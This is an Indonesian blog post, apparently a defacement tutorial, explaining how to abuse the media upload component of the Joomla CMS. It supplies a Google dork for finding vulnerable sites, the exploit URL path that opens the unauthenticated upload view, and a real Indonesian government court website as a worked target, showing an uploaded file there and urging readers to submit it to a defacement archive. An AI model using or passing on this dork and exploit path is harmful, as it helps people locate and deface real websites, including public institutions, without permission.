Kali ini Saya membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla.. :) pada penasaran gimana caranya? Nyimak
Dork : inurl:com_media site:com
Exploit:
/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Pertama sobat cari dah targetnya dulu di
google dengan memanfaatkan dork diatas, dan kalo bisa Dork Dikreasikan
Saya Menemukan Target Lumayan : http://www.pn-sleman.go.id/ [ go.id bro Lumayan ]
Nah, sekarang kita tambahin aja exploitnya, jadinya begini:
http://www.pn-sleman.go.id/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Selanjutnya sobat tinggal upload file yang sobat inginkan di bagian upload
Note: File yang bisa diupload Hanya Bisa .txt .jpg .gif .png.
kalo berhasil, akan muncul keterangan seperti berikut:
Nah, untuk melihat hasil file yang sudah kita upload di sini: site.com/images/file
cth: http:/www.pn-sleman.go.id/images/DzikriID.txt
lihat hasil file yang sudah saya upload tadi :) tinggal Submit aja di deface archiver :p
Cuma Itu Yang Bisa Saya Share Selebihnya Usaha
Creator : Dzikri Dot ID
Tidak ada komentar:
Posting Komentar